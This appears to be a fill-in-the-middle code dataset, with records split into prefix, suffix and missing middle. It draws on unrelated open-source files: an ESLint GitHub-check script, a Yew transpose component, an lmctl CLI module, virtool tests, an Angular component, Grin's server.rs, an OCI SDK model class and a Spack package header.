summary: `${ errorCount } error(s), ${ warningCount } warning(s) found`, | })));
await updateCheck(id, {
status: 'completed',
completed_at: (new Date()).toISOString(),
conclusion: errorCount > 0 ? 'failure' : warningCount > 0 && 'neutral' || 'success',
output: {
title: checkName,
summary: `${ errorCount } error(s), ${ warningCount } warning(s) found`
}
});
},
run = async () => {
const id = await createCheck();
try {
await updateChecks(id, await eslint());
} catch (err) {
await updateCheck(id, {
conclusion: 'failure',
status: 'completed',
completed_at: (new Date()).toISOString(),
output: {
title: checkName,
summary: `Error while performing the check: ${err.message}`
}
});
exitWithError(err);
}
};
run().catch(exitWithError); | annotations: annotations.slice(i * chunkSize, (i + 1) * chunkSize)
} |
transpose_tool.rs | use log::error;
use log::info;
use yew::prelude::*;
#[derive(Properties, PartialEq, Clone)]
pub struct TransposeToolProps {
pub transpose_semitone: isize,
pub show_input_field: bool,
pub on_click_up: Callback<()>,
pub on_click_down: Callback<()>,
pub on_set: Callback<isize>,
}
pub enum Msg {
InputChange(ChangeData),
}
pub struct TransposeTool {
/// State from the parent
props: TransposeToolProps,
/// Utility object
link: ComponentLink<Self>,
}
impl Component for TransposeTool {
type Message = Msg;
type Properties = TransposeToolProps;
fn create(props: Self::Properties, link: ComponentLink<Self>) -> Self {
Self { link, props }
}
fn update(&mut self, msg: Self::Message) -> ShouldRender {
match msg {
Msg::InputChange(ChangeData::Value(v)) => {
info!("{:?}", v);
match v.parse::<isize>() {
Ok(v) => {
self.props.on_set.emit(v);
}
Err(_) => {
error!("Invalid change data {:?}", v);
}
};
}
Msg::InputChange(change_data) => error!("Invalid change data {:?}", change_data),
};
true
}
fn change(&mut self, props: Self::Properties) -> ShouldRender {
if self.props != props {
self.props = props;
true
} else {
false
}
}
fn | (&self) -> Html {
let transpose_semitone = self.props.transpose_semitone;
let transpose_up = self.props.on_click_up.reform(|_| ());
let transpose_down = self.props.on_click_down.reform(|_| ());
let show_input_field = self.props.show_input_field;
let number_output = if show_input_field {
let onchange = self.link.callback(Msg::InputChange);
html! {<input type="number" min="-11" max="11" onchange=onchange value=transpose_semitone.to_string()/>}
} else {
html! {<span class="value">{transpose_semitone}</span>}
};
let disable_down = transpose_semitone < -11;
let disable_up = transpose_semitone > 11;
let inner = html! {
<>
<span class="icon">{"♬"}</span>
<button class="discreet" disabled=disable_down onclick=transpose_down><i class="im im-angle-left"></i></button>
{number_output}
<button class="discreet" disabled=disable_up onclick=transpose_up><i class="im im-angle-right"></i></button>
<span class="sr-only">{"Transpose song"}</span>
</>
};
(if show_input_field {
html! {
<div class="transpose-tool">
<label title="Transpose song">
{inner}
</label>
</div>
}
} else {
html! {
<div class="transpose-tool">
<div title="Transpose song">
{inner}
</div>
</div>
}
}) as Html
}
}
| view |
behaviour_projects.py | import click
from typing import Dict
from lmctl.client import TNCOClient, TNCOClientHttpError
from lmctl.cli.arguments import common_output_format_handler
from lmctl.cli.format import Table, Column
from .tnco_target import TNCOTarget, LmGet, LmCreate, LmUpdate, LmDelete, LmGen
class ProjectTable(Table):
columns = [
Column('name', header='Name'),
Column('description', header='Description')
]
output_formats = common_output_format_handler(table=ProjectTable())
class Projects(TNCOTarget):
name = 'behaviourproject'
plural = 'behaviourprojects'
display_name = 'Behaviour Project'
@LmGen()
def genfile(self, ctx: click.Context, name: str):
return {
'name': f'assembly::{name}::1.0',
}
@LmGet(output_formats=output_formats, help=f'''\
Get all {display_name}s or get one by name\
\n\nUse NAME argument to get by one by name\
\n\nOmit NAME argument get all projects\
\n\nNote: all Assembly descriptors have a Behaviour Project associated with them so can be found using their name e.g. assembly::example::1.0''')
@click.argument('name', required=False)
def get(self, tnco_client: TNCOClient, ctx: click.Context, name: str = None):
api = tnco_client.behaviour_projects
if name is not None:
return api.get(name)
else:
return api.all()
@LmCreate()
def create(self, tnco_client: TNCOClient, ctx: click.Context, file_content: Dict = None, set_values: Dict = None):
api = tnco_client.behaviour_projects
if file_content is not None:
|
else:
project = set_values
result = api.create(project)
return result.get('name')
@LmUpdate()
@click.argument('name', required=False)
def update(self, tnco_client: TNCOClient, ctx: click.Context, file_content: Dict = None, name: str = None, set_values: Dict = None):
api = tnco_client.behaviour_projects
if file_content is not None:
if name is not None:
raise click.BadArgumentUsage(message='Do not use "NAME" argument when using "-f, --file" option', ctx=ctx)
project = file_content
else:
if name is None:
raise click.BadArgumentUsage(message='Must set "NAME" argument when no "-f, --file" option specified', ctx=ctx)
project = api.get(name)
project.update(set_values)
result = api.update(project)
return project.get('name')
@LmDelete()
@click.argument('name', required=False)
def delete(self, tnco_client: TNCOClient, ctx: click.Context, file_content: Dict = None, name: str = None, ignore_missing: bool = None):
api = tnco_client.behaviour_projects
if file_content is not None:
if name is not None:
raise click.BadArgumentUsage(message='Do not use "NAME" argument when using "-f, --file" option', ctx=ctx)
project = file_content
project_id = project.get('id', project.get('name', None))
if project_id is None:
raise click.BadArgumentUsage(message='Object from file does not contain an "name" (or "id") attribute', ctx=ctx)
else:
if name is None:
raise click.BadArgumentUsage(message='Must set "NAME" argument when no "-f, --file" option specified', ctx=ctx)
project_id = name
try:
result = api.delete(project_id)
except TNCOClientHttpError as e:
if e.status_code == 404:
# Not found
if ignore_missing:
ctl = self._get_controller()
ctl.io.print(f'No {self.display_name} found with name (ID) {project_id} (ignoring)')
return
raise
return project_id | if set_values is not None and len(set_values) > 0:
raise click.BadArgumentUsage(message='Do not use "--set" option when using "-f, --file" option', ctx=ctx)
project = file_content |
test_utils.py | import os
import pytest
from virtool.subtractions.utils import (
check_subtraction_file_type,
get_subtraction_files,
join_subtraction_path,
rename_bowtie_files,
)
def test_join_subtraction_path(tmp_path, config):
assert join_subtraction_path(config, "bar") == tmp_path / "subtractions" / "bar"
async def | (snapshot, pg, test_subtraction_files):
assert await get_subtraction_files(pg, "foo") == snapshot
def test_rename_bowtie_files(tmp_path):
test_dir = tmp_path / "subtractions"
test_dir.mkdir()
test_dir.joinpath("reference.1.bt2").write_text("Bowtie2 file")
test_dir.joinpath("reference.2.bt2").write_text("Bowtie2 file")
test_dir.joinpath("reference.3.bt2").write_text("Bowtie2 file")
rename_bowtie_files(test_dir)
assert set(os.listdir(test_dir)) == {
"subtraction.1.bt2",
"subtraction.2.bt2",
"subtraction.3.bt2",
}
@pytest.mark.parametrize("file_type", ["fasta", "bowtie2"])
def test_check_subtraction_file_type(file_type):
if file_type == "fasta":
result = check_subtraction_file_type("subtraction.fa.gz")
assert result == "fasta"
if file_type == "bowtie2":
result = check_subtraction_file_type("subtraction.1.bt2")
assert result == "bowtie2"
| test_get_subtraction_files |
app.component.ts | import { Component, VERSION } from "@angular/core";
import "./string.extensions";
import { Test } from "./test";
@Component({
selector: "my-app",
templateUrl: "./app.component.html",
styleUrls: ["./app.component.css"]
})
export class AppComponent {
title = `Angular ${VERSION.major} service using in extension method `;
serviceMessage = "";
| constructor() {
this.serviceMessage = Test.serviceMessage();
}
} | |
server.rs | // Copyright 2018 The Grin Developers
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
//! Grin server implementation, glues the different parts of the system (mostly
//! the peer-to-peer server, the blockchain and the transaction pool) and acts
//! as a facade.
use std::fs;
use std::fs::File;
use std::io::prelude::*;
use std::path::Path;
use std::sync::Arc;
use std::{thread, time};
use fs2::FileExt;
use crate::api;
use crate::api::TLSConfig;
use crate::chain;
use crate::common::adapters::{
ChainToPoolAndNetAdapter, NetToChainAdapter, PoolToChainAdapter, PoolToNetAdapter,
};
use crate::common::stats::{DiffBlock, DiffStats, PeerStats, ServerStateInfo, ServerStats};
use crate::common::types::{Error, ServerConfig, StratumServerConfig, SyncState, SyncStatus};
use crate::core::core::hash::{Hashed, ZERO_HASH};
use crate::core::core::verifier_cache::{LruVerifierCache, VerifierCache};
use crate::core::{consensus, genesis, global, pow};
use crate::grin::{dandelion_monitor, seed, sync};
use crate::mining::stratumserver;
use crate::mining::test_miner::Miner;
use crate::p2p;
use crate::p2p::types::PeerAddr;
use crate::pool;
use crate::store;
use crate::util::file::get_first_line;
use crate::util::{Mutex, RwLock, StopState};
/// Grin server holding internal structures.
pub struct Server {
/// server config
pub config: ServerConfig,
/// handle to our network server
pub p2p: Arc<p2p::Server>,
/// data store access
pub chain: Arc<chain::Chain>,
/// in-memory transaction pool
tx_pool: Arc<RwLock<pool::TransactionPool>>,
/// Shared cache for verification results when
/// verifying rangeproof and kernel signatures.
verifier_cache: Arc<RwLock<dyn VerifierCache>>,
/// Whether we're currently syncing
sync_state: Arc<SyncState>,
/// To be passed around to collect stats and info
state_info: ServerStateInfo,
/// Stop flag
pub stop_state: Arc<Mutex<StopState>>,
/// Maintain a lock_file so we do not run multiple Grin nodes from same dir.
lock_file: Arc<File>,
}
impl Server {
/// Instantiates and starts a new server. Optionally takes a callback
/// for the server to send an ARC copy of itself, to allow another process
/// to poll info about the server status
pub fn start<F>(config: ServerConfig, mut info_callback: F) -> Result<(), Error>
where
F: FnMut(Arc<Server>),
{
let mining_config = config.stratum_mining_config.clone();
let enable_test_miner = config.run_test_miner;
let test_miner_wallet_url = config.test_miner_wallet_url.clone();
let serv = Arc::new(Server::new(config)?);
if let Some(c) = mining_config {
let enable_stratum_server = c.enable_stratum_server;
if let Some(s) = enable_stratum_server {
if s {
{
let mut stratum_stats = serv.state_info.stratum_stats.write();
stratum_stats.is_enabled = true;
}
serv.start_stratum_server(c.clone());
}
}
}
if let Some(s) = enable_test_miner {
if s {
serv.start_test_miner(test_miner_wallet_url, serv.stop_state.clone());
}
}
info_callback(serv.clone());
loop {
thread::sleep(time::Duration::from_secs(1));
if serv.stop_state.lock().is_stopped() {
return Ok(());
}
}
}
// Exclusive (advisory) lock_file to ensure we do not run multiple
// instance of grin server from the same dir.
// This uses fs2 and should be safe cross-platform unless somebody abuses the file itself.
fn one_grin_at_a_time(config: &ServerConfig) -> Result<Arc<File>, Error> |
/// Instantiates a new server associated with the provided future reactor.
pub fn new(config: ServerConfig) -> Result<Server, Error> {
// Obtain our lock_file or fail immediately with an error.
let lock_file = Server::one_grin_at_a_time(&config)?;
// Defaults to None (optional) in config file.
// This translates to false here.
let archive_mode = match config.archive_mode {
None => false,
Some(b) => b,
};
let stop_state = Arc::new(Mutex::new(StopState::new()));
// Shared cache for verification results.
// We cache rangeproof verification and kernel signature verification.
let verifier_cache = Arc::new(RwLock::new(LruVerifierCache::new()));
let pool_adapter = Arc::new(PoolToChainAdapter::new());
let pool_net_adapter = Arc::new(PoolToNetAdapter::new());
let tx_pool = Arc::new(RwLock::new(pool::TransactionPool::new(
config.pool_config.clone(),
pool_adapter.clone(),
verifier_cache.clone(),
pool_net_adapter.clone(),
)));
let sync_state = Arc::new(SyncState::new());
let chain_adapter = Arc::new(ChainToPoolAndNetAdapter::new(tx_pool.clone()));
let genesis = match config.chain_type {
global::ChainTypes::AutomatedTesting => genesis::genesis_dev(),
global::ChainTypes::UserTesting => genesis::genesis_dev(),
global::ChainTypes::Floonet => genesis::genesis_floo(),
global::ChainTypes::Mainnet => genesis::genesis_main(),
};
info!("Starting server, genesis block: {}", genesis.hash());
let db_env = Arc::new(store::new_env(config.db_root.clone()));
let shared_chain = Arc::new(chain::Chain::init(
config.db_root.clone(),
db_env,
chain_adapter.clone(),
genesis.clone(),
pow::verify_size,
verifier_cache.clone(),
archive_mode,
stop_state.clone(),
)?);
pool_adapter.set_chain(shared_chain.clone());
let net_adapter = Arc::new(NetToChainAdapter::new(
sync_state.clone(),
shared_chain.clone(),
tx_pool.clone(),
verifier_cache.clone(),
config.clone(),
));
let peer_db_env = Arc::new(store::new_named_env(
config.db_root.clone(),
"peer".into(),
config.p2p_config.peer_max_count,
));
let p2p_server = Arc::new(p2p::Server::new(
peer_db_env,
config.p2p_config.capabilities,
config.p2p_config.clone(),
net_adapter.clone(),
genesis.hash(),
stop_state.clone(),
)?);
chain_adapter.init(p2p_server.peers.clone());
pool_net_adapter.init(p2p_server.peers.clone());
net_adapter.init(p2p_server.peers.clone());
if config.p2p_config.seeding_type != p2p::Seeding::Programmatic {
let seeder = match config.p2p_config.seeding_type {
p2p::Seeding::None => {
warn!("No seed configured, will stay solo until connected to");
seed::predefined_seeds(vec![])
}
p2p::Seeding::List => match &config.p2p_config.seeds {
Some(seeds) => seed::predefined_seeds(seeds.clone()),
None => {
return Err(Error::Configuration(
"Seeds must be configured for seeding type List".to_owned(),
));
}
},
p2p::Seeding::DNSSeed => seed::dns_seeds(),
_ => unreachable!(),
};
seed::connect_and_monitor(
p2p_server.clone(),
config.p2p_config.capabilities,
config.dandelion_config.clone(),
seeder,
config.p2p_config.peers_preferred.clone(),
stop_state.clone(),
);
}
// Defaults to None (optional) in config file.
// This translates to false here so we do not skip by default.
let skip_sync_wait = config.skip_sync_wait.unwrap_or(false);
sync_state.update(SyncStatus::AwaitingPeers(!skip_sync_wait));
sync::run_sync(
sync_state.clone(),
p2p_server.peers.clone(),
shared_chain.clone(),
stop_state.clone(),
);
let p2p_inner = p2p_server.clone();
let _ = thread::Builder::new()
.name("p2p-server".to_string())
.spawn(move || p2p_inner.listen());
info!("Starting rest apis at: {}", &config.api_http_addr);
let api_secret = get_first_line(config.api_secret_path.clone());
let tls_conf = match config.tls_certificate_file.clone() {
None => None,
Some(file) => {
let key = match config.tls_certificate_key.clone() {
Some(k) => k,
None => {
let msg = format!("Private key for certificate is not set");
return Err(Error::ArgumentError(msg));
}
};
Some(TLSConfig::new(file, key))
}
};
api::start_rest_apis(
config.api_http_addr.clone(),
shared_chain.clone(),
tx_pool.clone(),
p2p_server.peers.clone(),
api_secret,
tls_conf,
);
info!("Starting dandelion monitor: {}", &config.api_http_addr);
dandelion_monitor::monitor_transactions(
config.dandelion_config.clone(),
tx_pool.clone(),
verifier_cache.clone(),
stop_state.clone(),
);
warn!("Grin server started.");
Ok(Server {
config,
p2p: p2p_server,
chain: shared_chain,
tx_pool,
verifier_cache,
sync_state,
state_info: ServerStateInfo {
..Default::default()
},
stop_state,
lock_file,
})
}
/// Asks the server to connect to a peer at the provided network address.
pub fn connect_peer(&self, addr: PeerAddr) -> Result<(), Error> {
self.p2p.connect(addr)?;
Ok(())
}
/// Ping all peers, mostly useful for tests to have connected peers share
/// their heights
pub fn ping_peers(&self) -> Result<(), Error> {
let head = self.chain.head()?;
self.p2p.peers.check_all(head.total_difficulty, head.height);
Ok(())
}
/// Number of peers
pub fn peer_count(&self) -> u32 {
self.p2p.peers.peer_count()
}
/// Start a minimal "stratum" mining service on a separate thread
pub fn start_stratum_server(&self, config: StratumServerConfig) {
let edge_bits = global::min_edge_bits();
let proof_size = global::proofsize();
let sync_state = self.sync_state.clone();
let mut stratum_server = stratumserver::StratumServer::new(
config.clone(),
self.chain.clone(),
self.tx_pool.clone(),
self.verifier_cache.clone(),
);
let stratum_stats = self.state_info.stratum_stats.clone();
let _ = thread::Builder::new()
.name("stratum_server".to_string())
.spawn(move || {
stratum_server.run_loop(stratum_stats, edge_bits as u32, proof_size, sync_state);
});
}
/// Start mining for blocks internally on a separate thread. Relies on
/// internal miner, and should only be used for automated testing. Burns
/// reward if wallet_listener_url is 'None'
pub fn start_test_miner(
&self,
wallet_listener_url: Option<String>,
stop_state: Arc<Mutex<StopState>>,
) {
info!("start_test_miner - start",);
let sync_state = self.sync_state.clone();
let config_wallet_url = match wallet_listener_url.clone() {
Some(u) => u,
None => String::from("http://127.0.0.1:13415"),
};
let config = StratumServerConfig {
attempt_time_per_block: 60,
burn_reward: false,
enable_stratum_server: None,
stratum_server_addr: None,
wallet_listener_url: config_wallet_url,
minimum_share_difficulty: 1,
};
let mut miner = Miner::new(
config.clone(),
self.chain.clone(),
self.tx_pool.clone(),
self.verifier_cache.clone(),
stop_state,
);
miner.set_debug_output_id(format!("Port {}", self.config.p2p_config.port));
let _ = thread::Builder::new()
.name("test_miner".to_string())
.spawn(move || {
// TODO push this down in the run loop so miner gets paused anytime we
// decide to sync again
let secs_5 = time::Duration::from_secs(5);
while sync_state.is_syncing() {
thread::sleep(secs_5);
}
miner.run_loop(wallet_listener_url);
});
}
/// The chain head
pub fn head(&self) -> Result<chain::Tip, Error> {
self.chain.head().map_err(|e| e.into())
}
/// The head of the block header chain
pub fn header_head(&self) -> Result<chain::Tip, Error> {
self.chain.header_head().map_err(|e| e.into())
}
/// Returns a set of stats about this server. This and the ServerStats
/// structure
/// can be updated over time to include any information needed by tests or
/// other
/// consumers
pub fn get_server_stats(&self) -> Result<ServerStats, Error> {
let stratum_stats = self.state_info.stratum_stats.read().clone();
// Fill out stats on our current difficulty calculation
// TODO: check the overhead of calculating this again isn't too much
// could return it from next_difficulty, but would rather keep consensus
// code clean. This may be handy for testing but not really needed
// for release
let diff_stats = {
let last_blocks: Vec<consensus::HeaderInfo> =
global::difficulty_data_to_vector(self.chain.difficulty_iter()?)
.into_iter()
.collect();
let tip_height = self.head()?.height as i64;
let mut height = tip_height as i64 - last_blocks.len() as i64 + 1;
let txhashset = self.chain.txhashset();
let txhashset = txhashset.read();
let diff_entries: Vec<DiffBlock> = last_blocks
.windows(2)
.map(|pair| {
let prev = &pair[0];
let next = &pair[1];
height += 1;
// Use header hash if real header.
// Default to "zero" hash if synthetic header_info.
let hash = if height >= 0 {
if let Ok(header) = txhashset.get_header_by_height(height as u64) {
header.hash()
} else {
ZERO_HASH
}
} else {
ZERO_HASH
};
DiffBlock {
block_height: height,
block_hash: hash,
difficulty: next.difficulty.to_num(),
time: next.timestamp,
duration: next.timestamp - prev.timestamp,
secondary_scaling: next.secondary_scaling,
is_secondary: next.is_secondary,
}
})
.collect();
let block_time_sum = diff_entries.iter().fold(0, |sum, t| sum + t.duration);
let block_diff_sum = diff_entries.iter().fold(0, |sum, d| sum + d.difficulty);
DiffStats {
height: height as u64,
last_blocks: diff_entries,
average_block_time: block_time_sum / (consensus::DIFFICULTY_ADJUST_WINDOW - 1),
average_difficulty: block_diff_sum / (consensus::DIFFICULTY_ADJUST_WINDOW - 1),
window_size: consensus::DIFFICULTY_ADJUST_WINDOW,
}
};
let peer_stats = self
.p2p
.peers
.connected_peers()
.into_iter()
.map(|p| PeerStats::from_peer(&p))
.collect();
Ok(ServerStats {
peer_count: self.peer_count(),
head: self.head()?,
header_head: self.header_head()?,
sync_status: self.sync_state.status(),
stratum_stats: stratum_stats,
peer_stats: peer_stats,
diff_stats: diff_stats,
})
}
/// Stop the server.
pub fn stop(&self) {
self.p2p.stop();
self.stop_state.lock().stop();
let _ = self.lock_file.unlock();
}
/// Pause the p2p server.
pub fn pause(&self) {
self.stop_state.lock().pause();
thread::sleep(time::Duration::from_secs(1));
self.p2p.pause();
}
/// Resume p2p server.
/// TODO - We appear not to resume the p2p server (peer connections) here?
pub fn resume(&self) {
self.stop_state.lock().resume();
}
/// Stops the test miner without stopping the p2p layer
pub fn stop_test_miner(&self, stop: Arc<Mutex<StopState>>) {
stop.lock().stop();
info!("stop_test_miner - stop",);
}
}
| {
let path = Path::new(&config.db_root);
fs::create_dir_all(path.clone())?;
let path = path.join("grin.lock");
let lock_file = fs::OpenOptions::new()
.read(true)
.write(true)
.create(true)
.open(&path)?;
lock_file.try_lock_exclusive().map_err(|e| {
let mut stderr = std::io::stderr();
writeln!(
&mut stderr,
"Failed to lock {:?} (grin server already running?)",
path
)
.expect("Could not write to stderr");
e
})?;
Ok(Arc::new(lock_file))
} |
launch_db_system_from_db_system_details.py | # coding: utf-8
# Copyright (c) 2016, 2022, Oracle and/or its affiliates. All rights reserved.
# This software is dual-licensed to you under the Universal Permissive License (UPL) 1.0 as shown at https://oss.oracle.com/licenses/upl or Apache License 2.0 as shown at http://www.apache.org/licenses/LICENSE-2.0. You may choose either license.
from .launch_db_system_base import LaunchDbSystemBase
from oci.util import formatted_flat_dict, NONE_SENTINEL, value_allowed_none_or_none_sentinel # noqa: F401
from oci.decorators import init_model_state_from_kwargs
@init_model_state_from_kwargs
class LaunchDbSystemFromDbSystemDetails(LaunchDbSystemBase):
"""
Used for creating a new database system by cloning an existing DB system.
"""
#: A constant which can be used with the license_model property of a LaunchDbSystemFromDbSystemDetails.
#: This constant has a value of "LICENSE_INCLUDED"
LICENSE_MODEL_LICENSE_INCLUDED = "LICENSE_INCLUDED"
#: A constant which can be used with the license_model property of a LaunchDbSystemFromDbSystemDetails.
#: This constant has a value of "BRING_YOUR_OWN_LICENSE"
LICENSE_MODEL_BRING_YOUR_OWN_LICENSE = "BRING_YOUR_OWN_LICENSE"
def __init__(self, **kwargs):
"""
Initializes a new LaunchDbSystemFromDbSystemDetails object with values from keyword arguments. The default value of the :py:attr:`~oci.database.models.LaunchDbSystemFromDbSystemDetails.source` attribute
of this class is ``DB_SYSTEM`` and it should not be changed.
The following keyword arguments are supported (corresponding to the getters/setters of this class):
:param compartment_id:
The value to assign to the compartment_id property of this LaunchDbSystemFromDbSystemDetails.
:type compartment_id: str
:param fault_domains:
The value to assign to the fault_domains property of this LaunchDbSystemFromDbSystemDetails.
:type fault_domains: list[str]
:param display_name:
The value to assign to the display_name property of this LaunchDbSystemFromDbSystemDetails.
:type display_name: str
:param availability_domain:
The value to assign to the availability_domain property of this LaunchDbSystemFromDbSystemDetails.
:type availability_domain: str
:param subnet_id:
The value to assign to the subnet_id property of this LaunchDbSystemFromDbSystemDetails.
:type subnet_id: str
:param backup_subnet_id:
The value to assign to the backup_subnet_id property of this LaunchDbSystemFromDbSystemDetails.
:type backup_subnet_id: str
:param nsg_ids:
The value to assign to the nsg_ids property of this LaunchDbSystemFromDbSystemDetails.
:type nsg_ids: list[str]
:param backup_network_nsg_ids:
The value to assign to the backup_network_nsg_ids property of this LaunchDbSystemFromDbSystemDetails.
:type backup_network_nsg_ids: list[str]
:param shape:
The value to assign to the shape property of this LaunchDbSystemFromDbSystemDetails.
:type shape: str
:param time_zone:
The value to assign to the time_zone property of this LaunchDbSystemFromDbSystemDetails.
:type time_zone: str
:param db_system_options:
The value to assign to the db_system_options property of this LaunchDbSystemFromDbSystemDetails.
:type db_system_options: oci.database.models.DbSystemOptions
:param sparse_diskgroup:
The value to assign to the sparse_diskgroup property of this LaunchDbSystemFromDbSystemDetails.
:type sparse_diskgroup: bool
:param ssh_public_keys:
The value to assign to the ssh_public_keys property of this LaunchDbSystemFromDbSystemDetails.
:type ssh_public_keys: list[str]
:param hostname:
The value to assign to the hostname property of this LaunchDbSystemFromDbSystemDetails.
:type hostname: str
:param domain:
The value to assign to the domain property of this LaunchDbSystemFromDbSystemDetails.
:type domain: str
:param cpu_core_count:
The value to assign to the cpu_core_count property of this LaunchDbSystemFromDbSystemDetails.
:type cpu_core_count: int
:param cluster_name:
The value to assign to the cluster_name property of this LaunchDbSystemFromDbSystemDetails.
:type cluster_name: str
:param data_storage_percentage:
The value to assign to the data_storage_percentage property of this LaunchDbSystemFromDbSystemDetails.
:type data_storage_percentage: int
:param initial_data_storage_size_in_gb:
The value to assign to the initial_data_storage_size_in_gb property of this LaunchDbSystemFromDbSystemDetails.
:type initial_data_storage_size_in_gb: int
:param kms_key_id:
The value to assign to the kms_key_id property of this LaunchDbSystemFromDbSystemDetails.
:type kms_key_id: str
:param kms_key_version_id:
The value to assign to the kms_key_version_id property of this LaunchDbSystemFromDbSystemDetails.
:type kms_key_version_id: str
:param node_count:
The value to assign to the node_count property of this LaunchDbSystemFromDbSystemDetails.
:type node_count: int
:param freeform_tags:
The value to assign to the freeform_tags property of this LaunchDbSystemFromDbSystemDetails.
:type freeform_tags: dict(str, str)
:param defined_tags:
The value to assign to the defined_tags property of this LaunchDbSystemFromDbSystemDetails.
:type defined_tags: dict(str, dict(str, object))
:param source:
The value to assign to the source property of this LaunchDbSystemFromDbSystemDetails.
Allowed values for this property are: "NONE", "DB_BACKUP", "DATABASE", "DB_SYSTEM"
:type source: str
:param private_ip:
The value to assign to the private_ip property of this LaunchDbSystemFromDbSystemDetails.
:type private_ip: str
:param source_db_system_id:
The value to assign to the source_db_system_id property of this LaunchDbSystemFromDbSystemDetails.
:type source_db_system_id: str
:param db_home:
The value to assign to the db_home property of this LaunchDbSystemFromDbSystemDetails.
:type db_home: oci.database.models.CreateDbHomeFromDbSystemDetails
:param license_model:
The value to assign to the license_model property of this LaunchDbSystemFromDbSystemDetails.
Allowed values for this property are: "LICENSE_INCLUDED", "BRING_YOUR_OWN_LICENSE"
:type license_model: str
"""
self.swagger_types = {
'compartment_id': 'str',
'fault_domains': 'list[str]',
'display_name': 'str',
'availability_domain': 'str',
'subnet_id': 'str',
'backup_subnet_id': 'str',
'nsg_ids': 'list[str]',
'backup_network_nsg_ids': 'list[str]',
'shape': 'str',
'time_zone': 'str',
'db_system_options': 'DbSystemOptions',
'sparse_diskgroup': 'bool',
'ssh_public_keys': 'list[str]',
'hostname': 'str',
'domain': 'str',
'cpu_core_count': 'int',
'cluster_name': 'str',
'data_storage_percentage': 'int',
'initial_data_storage_size_in_gb': 'int',
'kms_key_id': 'str',
'kms_key_version_id': 'str',
'node_count': 'int',
'freeform_tags': 'dict(str, str)',
'defined_tags': 'dict(str, dict(str, object))',
'source': 'str',
'private_ip': 'str',
'source_db_system_id': 'str',
'db_home': 'CreateDbHomeFromDbSystemDetails',
'license_model': 'str'
}
self.attribute_map = {
'compartment_id': 'compartmentId',
'fault_domains': 'faultDomains',
'display_name': 'displayName',
'availability_domain': 'availabilityDomain',
'subnet_id': 'subnetId',
'backup_subnet_id': 'backupSubnetId',
'nsg_ids': 'nsgIds',
'backup_network_nsg_ids': 'backupNetworkNsgIds',
'shape': 'shape',
'time_zone': 'timeZone',
'db_system_options': 'dbSystemOptions',
'sparse_diskgroup': 'sparseDiskgroup',
'ssh_public_keys': 'sshPublicKeys',
'hostname': 'hostname',
'domain': 'domain',
'cpu_core_count': 'cpuCoreCount',
'cluster_name': 'clusterName',
'data_storage_percentage': 'dataStoragePercentage',
'initial_data_storage_size_in_gb': 'initialDataStorageSizeInGB',
'kms_key_id': 'kmsKeyId',
'kms_key_version_id': 'kmsKeyVersionId',
'node_count': 'nodeCount',
'freeform_tags': 'freeformTags',
'defined_tags': 'definedTags',
'source': 'source',
'private_ip': 'privateIp',
'source_db_system_id': 'sourceDbSystemId',
'db_home': 'dbHome',
'license_model': 'licenseModel'
}
self._compartment_id = None
self._fault_domains = None
self._display_name = None
self._availability_domain = None
self._subnet_id = None
self._backup_subnet_id = None
self._nsg_ids = None
self._backup_network_nsg_ids = None
self._shape = None
self._time_zone = None
self._db_system_options = None
self._sparse_diskgroup = None
self._ssh_public_keys = None
self._hostname = None
self._domain = None
self._cpu_core_count = None
self._cluster_name = None
self._data_storage_percentage = None
self._initial_data_storage_size_in_gb = None
self._kms_key_id = None
self._kms_key_version_id = None
self._node_count = None
self._freeform_tags = None | self._private_ip = None
self._source_db_system_id = None
self._db_home = None
self._license_model = None
self._source = 'DB_SYSTEM'
@property
def source_db_system_id(self):
"""
**[Required]** Gets the source_db_system_id of this LaunchDbSystemFromDbSystemDetails.
The `OCID`__ of the DB system.
__ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm
:return: The source_db_system_id of this LaunchDbSystemFromDbSystemDetails.
:rtype: str
"""
return self._source_db_system_id
@source_db_system_id.setter
def source_db_system_id(self, source_db_system_id):
"""
Sets the source_db_system_id of this LaunchDbSystemFromDbSystemDetails.
The `OCID`__ of the DB system.
__ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm
:param source_db_system_id: The source_db_system_id of this LaunchDbSystemFromDbSystemDetails.
:type: str
"""
self._source_db_system_id = source_db_system_id
@property
def db_home(self):
"""
**[Required]** Gets the db_home of this LaunchDbSystemFromDbSystemDetails.
:return: The db_home of this LaunchDbSystemFromDbSystemDetails.
:rtype: oci.database.models.CreateDbHomeFromDbSystemDetails
"""
return self._db_home
@db_home.setter
def db_home(self, db_home):
"""
Sets the db_home of this LaunchDbSystemFromDbSystemDetails.
:param db_home: The db_home of this LaunchDbSystemFromDbSystemDetails.
:type: oci.database.models.CreateDbHomeFromDbSystemDetails
"""
self._db_home = db_home
@property
def license_model(self):
"""
Gets the license_model of this LaunchDbSystemFromDbSystemDetails.
The Oracle license model that applies to all the databases on the DB system. The default is LICENSE_INCLUDED.
Allowed values for this property are: "LICENSE_INCLUDED", "BRING_YOUR_OWN_LICENSE"
:return: The license_model of this LaunchDbSystemFromDbSystemDetails.
:rtype: str
"""
return self._license_model
@license_model.setter
def license_model(self, license_model):
"""
Sets the license_model of this LaunchDbSystemFromDbSystemDetails.
The Oracle license model that applies to all the databases on the DB system. The default is LICENSE_INCLUDED.
:param license_model: The license_model of this LaunchDbSystemFromDbSystemDetails.
:type: str
"""
allowed_values = ["LICENSE_INCLUDED", "BRING_YOUR_OWN_LICENSE"]
if not value_allowed_none_or_none_sentinel(license_model, allowed_values):
raise ValueError(
"Invalid value for `license_model`, must be None or one of {0}"
.format(allowed_values)
)
self._license_model = license_model
def __repr__(self):
return formatted_flat_dict(self)
def __eq__(self, other):
if other is None:
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
return not self == other | self._defined_tags = None
self._source = None |
package.py | # Copyright 2013-2020 Lawrence Livermore National Security, LLC and other
# Spack Project Developers. See the top-level COPYRIGHT file for details.
#
# SPDX-License-Identifier: (Apache-2.0 OR MIT)
from spack import *
class Gaudi(CMakePackage):
"""An experiment-independent HEP event data processing framework"""
homepage = "http://gaudi.web.cern.ch/gaudi/"
git = "https://gitlab.cern.ch/gaudi/Gaudi.git"
